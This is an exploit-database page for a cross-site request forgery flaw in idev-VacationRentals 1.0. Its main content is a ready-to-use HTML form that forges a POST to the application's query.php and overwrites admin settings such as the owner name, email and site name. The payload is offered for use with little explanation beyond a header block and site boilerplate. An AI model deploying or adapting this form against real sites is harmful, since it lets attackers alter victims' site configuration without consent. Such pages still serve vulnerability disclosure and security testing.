[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

idev-VacationRentals 1.0 CSRF Vulnerability

Author
Jonturk75
Risk
[
Security Risk Low
]
0day-ID
0day-ID-17973
Category
web applications
Date add
05-04-2012
Platform
php
< ------------------- header data start ------------------- >

#############################################################

# Application Name    :  idev-VacationRentals 1.0

# Vulnerable Type     :  CSRF

# Demo                :  http://idevspot.com/demos/idev-vacationrentals/admin

# Author              :  Jonturk75

# Greetz: Inj3ct0r Exploit DataBase 1337day.com

#############################################################

< ------------------- header data end of ------------------- >


<form action="../library/query.php" method="post" name="form1" id="form1">
<input name="controller" value="SETTINGS~update~settings~1" type="hidden">
<input name="YOURNAME" size="40" value="your name" type="hidden">
<input name="EMAIL" class="textarea100" value="mail@mail.com" type="hidden">
<input name="SITENAMES" size="40" value="sitename" type="hidden">
<input name="AFFID" class="textarea100" value="" type="hidden">
<select name="HELPBOX" size="1"><option> </option><option selected>Show</option><option>Hide</option></select>
<input name="Submit" value="Submit" type="submit">
</form>


< -- bug code end of -- >



#  0day.today [2024-09-21]  #